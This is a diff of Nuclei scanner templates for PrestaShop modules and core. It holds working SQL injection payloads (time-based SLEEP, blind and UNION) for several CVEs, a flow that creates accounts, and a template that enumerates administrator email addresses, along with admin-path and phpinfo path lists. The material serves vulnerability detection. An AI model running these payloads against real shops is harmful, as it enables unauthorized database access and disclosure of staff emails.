POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
X-Requested-With: XMLHttpRequest
leoajax=1&pro_add=-{{rand_int(0000, 9999)}})
matchers-condition: or
matchers:
- type: dsl
@@ -77,6 +93,13 @@ http:
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
condition: and
- type: dsl
name: time-based
dsl:
- 'duration_5>=6'
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
condition: and
- type: dsl
name: blind-based
dsl:
@@ -86,6 +109,13 @@ http:
- 'len(body_3) > 200 && len(body_4) <= 22'
condition: and
- type: dsl
name: error-based
dsl:
- 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")'
- 'contains(body_6, "You have an error in your SQL syntax")'
condition: and
extractors:
- type: regex
name: version
@@ -93,5 +123,4 @@ http:
internal: true
group: 1
regex:
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
# digest: 4b0a00483046022100bf6e7d4b44a6007e53495c84140743e2b8d4bb09af20cea698154be028e2302e022100c747f0965cca6cb175e486238b6992e5f236119209dad85440dcb14f94f2195b:922c64590222798bb761d5b6d8e72950
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"

217
http/cves/2022/CVE-2022-31101.yaml Normal file
View File

@@ -0,0 +1,217 @@
id: CVE-2022-31101
info:
name: Prestashop Blockwishlist 2.1.0 SQL Injection
author: mastercho
severity: high
description: |
Prestashop Blockwishlist module version 2.1.0 suffers from a remote authenticated SQL injection vulnerability.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31101
- https://github.com/PrestaShop/blockwishlist/security/advisories/GHSA-2jx3-5j9v-prpp
- https://packetstormsecurity.com/files/168003/Prestashop-Blockwishlist-2.1.0-SQL-Injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
cvss-score: 8.1
cve-id: CVE-2022-31101
cwe-id: CWE-89
epss-score: 0.13829
epss-percentile: 0.93938
cpe: cpe:2.3:a:prestashop:blockwishlist:*:*:*:*:*:*:*:*
metadata:
max-request: 8
vendor: prestashop
product: blockwishlist
tags: packetstorm,cve,cve2022,prestashop,prestashop-module,sqli,intrusive
variables:
first_name: "{{rand_base(4, 'abcdefghijklmnopqrstuvwxyz')}}"
last_name: "{{rand_base(4, 'abcdefghijklmnopqrstuvwxyz')}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
password: "{{rand_base(8)}}"
flow: |
http(1) && http(2) && http(3) && http(4) && (template["id_wishlist"] && template["id_wishlist"][0] ? (http(7) && http(8)) : (http(5) && http(6) && http(7) && http(8)))
http:
- method: GET
path:
- "{{BaseURL}}/modules/blockwishlist/config.xml"
extractors:
- type: regex
name: version
group: 1
regex:
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: status
status:
- 200
internal: true
- type: word
part: body
words:
- "Wishlist block"
internal: true
- type: dsl
name: version_check
dsl:
- compare_versions(version, '>= 2.0.0', '<= 2.1.0')
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
extractors:
- type: regex
name: id_product_raw
part: body
group: 1
regex:
- '/(\d+)-[a-z0-9\-]+\.html'
internal: true
- type: dsl
name: id_product
dsl:
- index(id_product_raw, 0)
internal: true
- raw:
- |
POST /{{login_path}}?create_account=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id_gender=1&firstname={{first_name}}&lastname={{last_name}}&email={{email}}&password={{password}}&birthday=&customer_privacy=1&psgdpr=1&submitCreate=1
payloads:
login_path:
- login
- en/login
- fr/login
- de/login
- pl/login
- es/login
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- regex('PrestaShop-[0-9a-f]{32}', header)
- status_code == 302
condition: and
internal: true
- raw:
- |
GET /module/blockwishlist/action?action=getAllWishlist HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"id_wishlist"'
- '"nbProducts"'
- '"name"'
condition: and
internal: true
extractors:
- type: json
name: id_wishlist_raw
part: body
json:
- .wishlists[0].id_wishlist
internal: true
- type: dsl
name: id_wishlist
dsl:
- index(id_wishlist_raw, 0)
internal: true
- id: create-wishlist
raw:
- |
GET /module/blockwishlist/action?action=createNewWishlist&params[name]=123 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"success"'
internal: true
- id: fetch-new-wishlist
raw:
- |
GET /module/blockwishlist/action?action=getAllWishlist HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: id_wishlist_raw
part: body
group: 1
regex:
- '"id_wishlist":"(\d+)"'
internal: true
- type: dsl
name: id_wishlist
dsl:
- 'index(id_wishlist_raw, 0)'
internal: true
matchers:
- type: word
part: body
words:
- '"id_wishlist"'
- '"nbProducts"'
- '"name"'
condition: and
internal: true
- id: add-product
raw:
- |
POST /module/blockwishlist/action?action=addProductToWishlist&params[id_product]={{id_product}}&params[idWishList]={{id_wishlist_raw}}&params[quantity]=1&params[id_product_attribute]=0 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"success":true'
internal: true
- id: sql-inj
raw:
- |
GET /module/blockwishlist/view?id_wishlist={{id_wishlist_raw}}&order=p.name,%20(select%20case%20when%20(1=1)%20then%20(SELECT%20SLEEP(7))%20else%201%20end);%20--%20.asc HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
name: time-based
dsl:
- 'duration >= 7'
- 'contains(to_lower(body), "prestashop")'
condition: and

85
http/cves/2023/CVE-2023-27032.yaml
View File

@@ -15,23 +15,47 @@ info:
cve-id: CVE-2023-27032
cwe-id: CWE-89
epss-score: 0.38387
epss-percentile: 0.9706
epss-percentile: 0.97054
cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 2
max-request: 3
vendor: idnovate
product: "popup_module_\\(on_entering\\,_exit_popup\\,_add_product\\)_and_newsletter"
product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter
framework: prestashop
shodan-query: "http.component:\"prestashop\""
shodan-query: http.component:"prestashop"
tags: time-based-sqli,cve,cve2023,sqli,prestashop,advancedpopupcreator,idnovate,vuln
flow: |
http(1) && (http(2) || http(3))
http:
- raw:
- id: "extract_values"
raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 5
extractors:
- type: regex
name: time
group: 1
regex:
- '"time":([0-9]+),'
internal: true
- type: regex
name: token
group: 1
regex:
- '"static_token":"([0-9a-z]+)",'
internal: true
- id: "time_based"
raw:
- |
@timeout 20s
POST /module/advancedpopupcreator/popup HTTP/1.1
@@ -40,27 +64,46 @@ http:
availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
- |
@timeout 20s
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
fromController=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&id_category=0&id_cms=1&id_manufacturer=0&id_product=0&id_supplier=0&referrer=1&responsiveWidth=1280&time={{time}}&token={{token}}&updateVisits=1&url=https%253A%252F%252F{{Hostname}}%252F
stop-at-first-match: true
matchers:
- type: dsl
name: time-based
dsl:
- duration_2>=6
- status_code == 200
- contains(content_type, "text/html")
- contains_all(body, 'popups','hasError')
- contains_all(body,'hasError')
- duration >= 6
condition: and
extractors:
- type: regex
name: time
group: 1
regex:
- ',"time":([0-9]+),'
internal: true
- id: "blind_based"
raw:
- |
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- type: regex
name: token
group: 1
regex:
- ',"static_token":"([0-9a-z]+)",'
internal: true
# digest: 4a0a0047304502207618e1d8fdfba3f49b72932ca68e147e4ba9d5b79594b0fff44f4f62758182f5022100c7cebc0d8b2c06d2e82fb7eb051a7bc50a4e91c5a6e909216e2e3e4cdd97d1b1:922c64590222798bb761d5b6d8e72950
availablePopups=-8514)%20OR%206158%3d6158--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
- |
POST /module/advancedpopupcreator/popup HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
availablePopups=-8514)%20OR%206158%3d6157--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
matchers:
- type: dsl
name: blind-based
dsl:
- 'status_code == 200'
- 'contains(tolower(response_1), "selector")'
- '!contains(tolower(response_2), "selector")'
condition: and

79
http/cves/2023/CVE-2023-27847.yaml
View File

@@ -7,7 +7,7 @@ info:
description: |
In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access and data leakage.
reference:
- https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27847
@@ -20,13 +20,13 @@ info:
epss-percentile: 0.98722
metadata:
verified: true
max-request: 2
max-request: 5
framework: prestashop
shodan-query: html:"/xipblog"
fofa-query: app="Prestashop"
tags: time-based-sqli,cve,cve2023,prestashop,sqli,xipblog,vuln
flow: http(1) && http(2)
flow: http(1) && http(2) && http(3) && http(4) && http(5)
variables:
num: "999999999"
@@ -37,34 +37,71 @@ http:
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'contains_any(tolower(response), "prestashop", "xipblog")'
- type: word
part: body
words:
- 'xipblog'
internal: true
- raw:
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(5)))AuDU)--+lafl HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 30s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(10)))AuDU)--+lafl HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
host-redirects: true
matchers:
- type: word
name: union-based
part: body_1
words:
- '{{md5({{num}})}}'
matchers:
- type: dsl
name: time-based
dsl:
- 'duration_2>=10'
# digest: 4a0a00473045022066b32803f87dd2f179912e061bc35cf781389eef5302b8c7ce22a1c884f30e56022100ceac4cea1e4063b960ed7cf0b3c93ff0fc2f4ead215e27a0d50fcc2df572b90b:922c64590222798bb761d5b6d8e72950
- 'duration >= 5'
- 'status_code != 404'
condition: and
- raw:
- |
@timeout: 20s
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: word
part: body
words:
- 'kr_blog_post_area'
internal: true
- raw:
- |
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+5484=5485--+xhCs HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
name: blind-based
dsl:
- '!contains(body, "kr_blog_post_area")'
internal: false
- raw:
- |
GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
name: union-based
dsl:
- 'status_code != 404'
- 'contains(body, "{{md5({{num}})}}")'
condition: and

55
http/cves/2023/CVE-2023-30150.yaml
View File

@@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-30150
cwe-id: CWE-89
epss-score: 0.5798
epss-percentile: 0.98068
epss-score: 0.51724
epss-percentile: 0.97536
cpe: cpe:2.3:a:leotheme:leocustomajax:1.0.0:*:*:*:*:prestashop:*:*
metadata:
verified: true
@@ -29,26 +29,61 @@ info:
vendor: leotheme
product: leocustomajax
framework: prestashop
shodan-query:
- http.component:"Prestashop"
- http.component:"prestashop"
tags: time-based-sqli,cve2023,cve,prestashop,sqli,leotheme,vkev,vuln
shodan-query: http.component:"Prestashop"
tags: cve,cve2023,prestashop,sqli,time-based-sqli,leotheme,vkev,vuln
variables:
random_id: "{{rand_text_numeric(13)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
GET /modules/leocustomajax/leocustomajax.js HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_any(body,'leocustomajax','processajax','.quick-view','leoajax')"
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /modules/leocustomajax/leoajax.php?rand={{random_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
X-Requested-With: XMLHttpRequest
leoajax=1&pro_add=if(now()=sysdate()%2Csleep(6)%2C0)
- |
@timeout: 20s
GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration_2>=6'
- 'contains(tolower(response_1), "prestashop")'
- 'duration_1>=6'
- 'contains(tolower(body_1), "pro_add")'
condition: and
# digest: 4a0a00473045022100f8004ab878eca88f094e293d4c0308c2331a64a30550de16a8879d127f06c91e02205cb264f25987d051fc5ccb614da8f98356b1e36469e85ad8050663590f0c016d:922c64590222798bb761d5b6d8e72950
- type: dsl
dsl:
- 'duration_2>=6'
- 'status_code_2 == 200'
- 'contains(content_type, "text/html")'
condition: and

217
http/cves/2025/CVE-2025-51586.yaml Normal file
View File

@@ -0,0 +1,217 @@
id: CVE-2025-51586
info:
name: PrestaShop - Information Disclosure
author: mastercho
severity: medium
description: |
User enumeration vulnerability in the AdminLogin controller in PrestaShop 1.7 through 8.2.2 allows remote attackers to obtain administrators user email addresses via manipulation of the id_employee and reset_token parameters. An attacker who has access to the Back Office login URL can trigger the password reset form to disclose the associated email address in a hidden field, even when the provided reset token is invalid. This issue has been fixed in 8.2.3.
reference:
- https://maxime-morel.github.io/advisories/2025/CVE-2025-51586.md
- https://security.friendsofpresta.org/core/2025/09/04/CVE-2025-51586.html
- https://nvd.nist.gov/vuln/detail/CVE-2025-51586
classification:
cwe-id: CWE-359
metadata:
verified: true
vendor: prestashop
product: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2025,prestashop,disclosure,token
variables:
token: "{{rand_base(32)}}"
token2: "{{rand_base(32)}}"
flow: |
// 1) Run panel detection on all common admin paths
http(1);
// 2) Unwrap matchedpath (extractors return a list in flow)
var path = "";
if (template["matchedpath"] && template["matchedpath"].length) {
for (let p of iterate(template["matchedpath"])) {
path = p;
break; // use first detected admin path
}
}
// 3) Unwrap version (first extracted value)
var v = "";
if (template["version"] && template["version"].length) {
for (let ver of iterate(template["version"])) {
v = ver;
break;
}
}
// 4) JS version check: vulnerable if version < 8.2.3
function isVulnerable(ver) {
if (!ver) return true; // unknown version -> still test
var parts = (ver + "").split(".");
var M = parseInt(parts[0] || "0", 10);
var m = parseInt(parts[1] || "0", 10);
var p = parseInt(parts[2] || "0", 10);
if (M < 8) return true;
if (M > 8) return false;
if (m < 2) return true;
if (m > 2) return false;
return p < 3; // 8.2.08.2.2 are vuln; 8.2.3+ are not
}
// 5) Only execute http(2) if we have a path AND the version is vulnerable
if (path && isVulnerable(v)) {
set("matchedpath", path); // scalar for interpolation in http(2)
http(2);
}
http:
- id: detect-panel
method: GET
path:
- '{{BaseURL}}/{{paths}}/'
payloads:
paths:
- 'backoffice'
- 'back-office'
- 'Backoffice'
- 'admin-dev'
- 'backend'
- 'admin_'
- 'mikromanage'
- 'manage'
- 'manager'
- 'adminshop'
- 'administrator'
- 'administracja'
- 'adm'
- 'webadmin'
- 'admin-web'
- 'kontrollpanel'
- 'amministra'
- 'adminas'
- 'admin123'
- 'admin0'
- 'adminxx'
- 'admin'
- 'ps-admin'
- 'admins'
- 'p-office'
- 'admin333'
- 'admin4444'
- 'admin66'
- 'backadmin'
- 'admin1'
- 'BackofficeNEW'
- '4dm1n'
- 'administrazione'
- 'accesadministrateur'
- '_admin123'
- 'iadmin'
- 'panel'
host-redirects: true
max-redirects: 3
extractors:
- type: regex
name: matchedpath
part: body
group: 1
internal: true
regex:
- 'value="https?:\/\/[^\/]+\/((?:[A-Za-z]{2}\/)?(?:[A-Za-z0-9_-]*admin(?:-dev)?|[Bb]ackoffice|adm|panel)[^"]*?)\/'
- type: regex
name: version
part: body
internal: true
group: 1
regex:
- 'login\.js\?v=([0-9.]+)'
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- 'PrestaShop'
- 'class="show-forgot-password'
condition: and
- type: word
part: body
words:
- 'themes/default/css/admin-theme.css'
- 'class="show-forgot-password'
condition: and
- id: generate-token
method: GET
path:
- '{{Scheme}}://{{Hostname}}/{{matchedpath}}/index.php?controller=AdminLogin&token={{token}}&id_employee={{id}}&reset_token={{token2}}'
payloads:
id:
- '1'
- '2'
- '3'
- '4'
- '5'
- '6'
- '7'
- '8'
- '9'
- '10'
- '11'
- '12'
- '13'
- '14'
- '15'
- '16'
- '17'
- '18'
- '19'
- '20'
- '21'
- '22'
- '23'
- '24'
- '25'
- '26'
- '27'
- '28'
- '29'
- '30'
iterate-all: true
extractors:
- type: regex
name: reset-email
part: body
group: 1
regex:
- '<input[^>]*name="reset_email"[^>]*value="([^"]+)"'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'AdminLogin'
- 'PrestaShop'
condition: and
- type: status
status:
- 200
- type: regex
part: body
regex:
- '<input[^>]*name="reset_email"[^>]*value="([^"]+)"'

27
http/exposed-panels/prestashop-admin-panel.yaml
View File

@@ -19,7 +19,6 @@ info:
shodan-query:
- http.component:"Prestashop"
- cpe:"cpe:2.3:a:prestashop:prestashop"
- http.component:"prestashop"
tags: prestashop,panel,login,discovery
http:
@@ -30,6 +29,7 @@ http:
payloads:
paths:
- 'backoffice'
- 'back-office'
- 'Backoffice'
- 'back-office'
- 'admin-dev'
@@ -52,9 +52,32 @@ http:
- 'adminxx'
- 'admin'
- 'ps-admin'
- 'admins'
- 'p-office'
- 'admin333'
- 'admin4444'
- 'admin66'
- 'backadmin'
- 'admin1'
- 'BackofficeNEW'
- '4dm1n'
- 'administrazione'
- 'accesadministrateur'
- '_admin123'
- 'iadmin'
- 'panel'
host-redirects: true
max-redirects: 3
stop-at-first-match: true
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- '<script type="text\/javascript" src="..\/js\/admin\/login.js\?v=([\d.]+)"><\/script>'
matchers-condition: or
matchers:
@@ -71,4 +94,4 @@ http:
- 'themes/default/css/admin-theme.css' # For modified admin panels
- 'class="show-forgot-password'
condition: and
# digest: 4a0a00473045022100c8b10c7b44eece6ef6aa824f902008c6bebf4c5b73a10dc82359fc7cc953b46202207307138c84e982ea5233074c5dc9969ed0121319a0e6127c007ba737d969486a:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402202e2aa076aeb51730ae9cf724df7d316a78ee1d38b6ade213d5839439a392f5db022002387b32693ae53791993436a10343c65e3911eb19d3b48fb23f2be2a59609cf:922c64590222798bb761d5b6d8e72950

1
http/exposures/configs/phpinfo-files.yaml
View File

@@ -46,6 +46,7 @@ http:
- "/_profiler/phpinfo"
- "/?phpinfo=1"
- "/l.php?act=phpinfo"
- "/testxx.php"
stop-at-first-match: true